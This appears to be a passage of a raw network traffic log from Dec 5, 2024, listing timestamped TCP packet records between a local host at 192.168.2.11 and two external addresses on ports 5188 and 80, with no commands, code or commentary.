                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.258868933 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.258883953 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.258929014 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.258929014 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.259974003 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.261162043 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.261178017 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.261279106 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.261298895 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.262252092 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.262371063 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.263191938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.263387918 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.263401031 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.263441086 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.263441086 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.264497995 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.264693022 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.265652895 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.265696049 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.265763998 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.266772032 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.266819954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.266927958 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.266962051 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.267927885 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.268030882 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.268071890 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.269150019 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.269337893 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.269756079 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.270163059 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.270597935 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.271342039 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.271378994 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.271527052 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.272469044 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.272505045 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.272818089 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.272875071 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.273612022 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.273675919 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.273715019 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.274749994 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.274825096 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.275903940 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.275953054 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.275990963 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.277017117 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.277086020 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.277376890 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.277853966 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.278153896 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.278340101 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.278400898 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.279303074 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.279644966 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.279885054 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.280411959 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.280437946 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.280567884 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.281558990 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.281645060 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.282139063 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.282722950 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.282824993 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.283868074 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.283941984 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.284215927 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.285082102 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.285157919 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.285229921 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.285881996 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.286092997 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.286150932 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.286204100 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.287444115 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.287782907 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.287842035 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.288752079 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.288774014 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.288912058 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.289798975 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.289818048 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.289912939 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.290692091 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.291007996 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.291851997 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.291975975 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.292002916 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.292949915 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.292998075 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.293518066 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.293941021 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.294111967 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.344166040 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.344315052 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.344405890 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.344913960 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.344964027 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.345087051 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.345226049 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.346086979 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.346201897 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.346225023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.346241951 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.346261024 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.347289085 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.347328901 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.347385883 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.347419024 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.348305941 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.348345041 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.348412037 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.348448992 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.349653006 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.349723101 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.349822998 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.349858046 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.350663900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.350728035 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.350739002 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.350842953 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.351721048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.351763964 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.351886034 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.351922989 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.352725029 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.352765083 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.353004932 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.353040934 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.353880882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.354044914 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.354090929 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.355081081 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.355124950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.355195999 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.355230093 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.356168032 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.356215000 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.356369972 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.356408119 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.357345104 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.357388020 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.357475996 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.357515097 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.358479023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.358515978 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.358700037 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.358736038 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.359719992 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.360059023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.360102892 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.360760927 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.360781908 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.360821962 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.360955954 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.360991001 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.361960888 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.362468958 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.362514973 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.363110065 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.363152027 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.363472939 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.363509893 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.364283085 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.364331961 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.364464998 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.364506960 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.365480900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.365556955 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.365605116 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.366673946 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.366718054 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.366749048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.366842985 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.367763996 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.367815018 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.367846012 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.367865086 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.368913889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.368977070 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.369282961 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.369321108 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.370089054 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.370251894 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.370343924 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.370385885 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.371211052 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.371253967 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.371500015 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.372375011 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.372417927 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.372513056 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.372550011 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.373509884 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.373545885 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.373625040 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.373656988 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.374718904 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.374799013 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.374845028 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.376053095 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.376091957 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.376169920 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.376213074 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.376987934 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.377027988 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.377144098 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.377183914 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.378142118 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.378339052 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.378381014 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.379277945 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.379326105 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.379534960 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.379585028 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.380434036 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.380477905 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.380563021 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.380604982 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.381589890 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.381633997 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.381701946 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.381742001 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.382777929 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.383004904 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.383059025 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.383899927 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.383951902 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.384304047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.384352922 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.385023117 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.385077953 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.385329962 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.385401011 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.386245012 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.386257887 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.386286974 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.386305094 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.387398958 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.387542963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.387583017 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.388559103 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.388830900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.388873100 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.389673948 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.389718056 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.389836073 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.389872074 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.390851021 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.390948057 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.390995026 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.391973019 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.392031908 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.392113924 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.392167091 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.393136024 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.393192053 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.393280983 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.393515110 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.394304991 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.394349098 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.394476891 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.394557953 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.395502090 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.395612001 CET8049793185.215.113.84192.168.2.11
